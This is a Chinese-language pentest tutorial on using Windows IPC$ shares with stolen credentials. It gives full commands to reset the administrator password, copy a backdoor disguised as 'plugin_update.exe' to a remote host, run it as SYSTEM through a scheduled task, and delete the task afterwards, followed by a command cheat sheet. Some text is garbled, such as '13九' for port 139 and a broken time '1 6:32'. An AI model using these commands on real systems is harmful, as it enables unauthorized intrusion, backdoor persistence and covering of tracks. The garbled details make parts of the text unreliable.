IPC$渗透使用

简介

IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通讯而开放的命名管道，经过提供可信任的用户名和口令，链接双方能够创建安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

使用条件

1.开放了13九、445端口；
2.目标开启ipc$文件共享；
3.获取用户帐号密码。

测试过程

此测试前提是获取了ipc$，
这里测试的时候获得的权限是system，而后建立了一个admin帐户，给了administrators权限，但没法复制文件过去，因而就改了administrator帐户密码（实战中不建议更改，可读取管理密码后再用读到的密码）。
更改密码：net user administrator "1qaz@WSX"

• 1.链接目标ipc$，将后门复制到目标机器上

net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe

• 2.建立自动任务，执行上传的后门程序

# 查看目标机器时间
net time \\193.168.1.12
# 建立该时间以后的某个时刻自动执行任务，任务名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 若是不想等，能够当即运行后门程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 删除建立的任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

接收端的目标机器已上线。

经常使用命令

# 1.链接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看链接状况
net use
# 3.查看目标主机共享资源
net view \\193.168.1.12
# 4.查看目标主机时间
net time \\193.168.1.12
# 5.查看目标主机的NetBIOS用户（本身本机也需开启）
nbtstat -A 193.168.1.12
# 6.删除链接
net use \\193.168.1.12\ipc$ /del
# 7.文件上传下载
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe   
（上传到目标的:c\windows\temp\目录下）
copy \\127.0.0.1\c$\test.exe c:\
（下载到本地c盘下）
# 8.建立计划任务
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.当即执行计划任务
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.删除计划任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"